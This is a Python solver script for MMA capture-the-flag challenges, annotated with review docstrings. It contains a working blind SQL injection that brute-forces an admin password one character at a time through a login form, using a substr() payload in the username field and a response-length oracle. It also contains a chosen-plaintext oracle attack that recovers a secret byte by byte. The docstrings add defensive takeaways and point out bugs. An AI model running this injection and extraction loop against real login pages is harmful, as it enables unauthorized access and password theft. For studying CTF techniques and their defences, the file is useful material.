from urllib.request import * | |
from urllib.parse import * | |
import string | |
# check the admin password one character at a time via SQL injection + substr()
# return True if we are able to log in (i.e. the character is a match), False otherwise
def challenge2(bURL, pos, char):
    """Probe one character of the admin password through a blind SQL injection.

    Args:
        bURL: login endpoint that receives the POST.
        pos: 1-based position handed to SQL ``substr()``.
        char: candidate character for that position.

    Returns:
        True when the response body is 36 characters or shorter, which the
        author uses as the "login succeeded / character matched" signal;
        False otherwise.  The threshold of 36 is empirical and cannot be
        derived from this file.

    Raises:
        ``urllib.error.URLError`` / ``HTTPError`` from ``urlopen`` on network
        failures or non-2xx responses; nothing here catches them.

    Defensive takeaway: this only works because the target presumably
    interpolates the raw ``username`` field into its SQL and answers with a
    differently sized page depending on the result, i.e. a one-bit oracle per
    request.  A parameterized query removes the injection; identical
    responses for every failed login remove the length side channel.
    Rate-limiting and alerting on many failed logins with SQL keywords in the
    username field would make this pattern visible in logs.
    """
    headers = {}
    headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0'
    headers['Accept-Language'] = 'en-GB,en;q=0.5'
    # Payload: closes the quoted username, appends a substr() comparison and
    # comments out the remainder of the statement.  Only the username field is
    # sent; no password field is included at all.
    values = {'username': 'admin\' and substr(password, {0}, 1) = \'{1}\'; - --'.format(pos,char)}
    data = urlencode(values).encode('utf-8')
    req = Request(bURL, data=data, headers=headers)
    # NOTE(review): the response is never closed; `with urlopen(req) as resp:`
    # would release the socket deterministically.
    resp = urlopen(req)
    data = resp.read().decode('utf-8')
    # Short body == success page, per the author's observation of the target.
    if len(data) <= 36:
        return True
    else:
        return False
def admin():
    """Recover the admin password one character at a time via ``challenge2``.

    Starts from the known flag prefix ``"MMA{"`` and, for each position, tries
    every candidate in ``[a-zA-Z0-9_}]`` until ``challenge2`` reports a match,
    then appends it and moves to the next position.

    Side effects: one HTTP POST per candidate per position, and progress is
    printed to stdout.

    Termination: ``flag`` is initialised to False and never set anywhere in
    the function, so ``while flag == False`` never exits on its own -- the
    loop keeps issuing requests even after ``}`` has been appended and must be
    interrupted by the user.  Indentation was reconstructed from a source that
    had lost it; the ``break`` is read as belonging to the ``if`` branch.
    """
    start = "MMA{"
    # substr() positions are 1-based, so the first unknown character is len+1.
    pos = len(start)+1
    flag = False
    print('Starting string: {0}'.format(start))
    while flag == False:
        # can also use string.printable or add more symbols but this seems to be ok
        for c in string.ascii_lowercase + string.ascii_uppercase + '0123456789_}':
            resp = challenge2("http://arrive.chal.mmactf.link/login.cgi", pos,c)
            if resp == True:
                start += c
                pos += 1
                print('Letter found: {0}\nString: {1}\n'.format(c, start))
                # Restart the candidate scan for the next position.
                break
def challenge(bURL, text):
    """POST ``text`` as form field ``s`` to *bURL* and scrape the reply.

    Args:
        bURL: endpoint to POST to.
        text: value for the ``s`` field; UTF-8 encoded before urlencoding.

    Returns:
        The text that follows the first ``</h1>`` in the response, cut at the
        next ``<`` and with its final character dropped (``[:-1]``).

    Raises:
        ``urllib.error.URLError`` / ``HTTPError`` from ``urlopen``.
        ``NameError`` if the page contains no ``</h1>``: the bare ``except``
        prints the raw body but ``sdata`` is never bound, so the following
        ``return sdata`` fails.

    The ``.submit`` value is mojibake in the committed source (a UTF-8 label
    decoded as Latin-1, presumably); it is left byte-for-byte as written
    because it is what the server is sent.
    """
    headers = {}
    headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0'
    headers['Accept-Language'] = 'en-GB,en;q=0.5'
    values = {'s': text.encode('utf-8'), '.submit': 'æå·å'}
    data = urlencode(values).encode('utf-8')
    req = Request(bURL, data=data, headers=headers)
    # NOTE(review): response object is never closed.
    resp = urlopen(req)
    data = resp.read().decode('utf-8')
    try:
        sdata = data.split("</h1>")[1].split("<")[0][:-1]
    except:
        # Bare except: any failure (usually IndexError from a page without
        # </h1>) is reported by dumping the body; sdata stays unbound.
        print(data)
    return sdata
def scs3(match, prefix=""):
    """Extend ``prefix`` one character at a time until the oracle output equals ``match``.

    Args:
        match: space-separated groups (hex byte pairs, judging by the
               commented-out call under ``__main__``) that the remote
               ``crypt6.cgi`` returns for the secret; presumably an
               encryption oracle, but that cannot be confirmed from this file.
        prefix: characters already recovered.

    Algorithm as written: for each candidate in ``[a-z0-9}]`` the oracle is
    queried with ``prefix + candidate`` and the reply is compared with
    ``match`` group by group starting at index 2.  A differing group rejects
    the candidate; an ``IndexError`` (reply has fewer groups than ``match``)
    is taken as "candidate accepted", the candidate is appended to ``prefix``
    and the scan restarts.  An exact string match ends the search.

    Side effects: one HTTP request per candidate, progress printed to stdout.
    The first ``challenge`` call before the loop is overwritten without being
    read.  If a reply differs from ``match`` but every compared group agrees
    and no ``IndexError`` occurs, ``i`` is not advanced and the same request
    repeats indefinitely.  Indentation was reconstructed from a source that
    had lost it; ``else:`` is read as the branch of ``if match != resp``.

    Defensive takeaway: a service that deterministically transforms
    attacker-chosen input concatenated with a secret lets the secret be
    recovered with a linear number of queries.  Randomised encryption (fresh
    IV/nonce per request) or refusing to mix caller input with secrets in one
    block removes the oracle.
    """
    printable = string.ascii_lowercase + '0123456789}'
    smatch = match.split(" ")
    resp = challenge("http://bow.chal.mmactf.link/~scs/crypt6.cgi", prefix)
    print("Starting string: {0}".format(prefix))
    i = 0
    while i < len(printable):
        resp = challenge("http://bow.chal.mmactf.link/~scs/crypt6.cgi", prefix + printable[i])
        if match != resp:
            sresp = resp.split(" ")
            try:
                # Groups 0 and 1 are skipped; presumably a header the author
                # found to vary -- not verifiable here.
                for x in range(2,len(smatch)):
                    if smatch[x] != sresp[x]:
                        # Reject this candidate and move to the next one.
                        i += 1
                        break
            except IndexError:
                # Shorter reply than `match` is treated as a hit.
                prefix += printable[i]
                print("New character found {0}\nString: {1}\n".format(printable[i],prefix))
                # Restart the candidate scan for the next position.
                i = 0
        else:
            print("Match found: {0}\n".format(prefix + printable[i]))
            break
# Script entry point: runs the login-oracle extraction; the scs3 invocation
# (with its recorded oracle output) is left commented out as in the original.
if __name__ == "__main__":
    #scs3("60 00 0c 3a 1e 52 02 53 02 51 0c 5d 56 51 5a 5f 5f 5a 51 00 05 53 56 0a 5e 00 52 05 03 51 50 55 03 04 52 04 0f 0f 54 52 57 03 52 04 4e","MMA{e7")
    admin()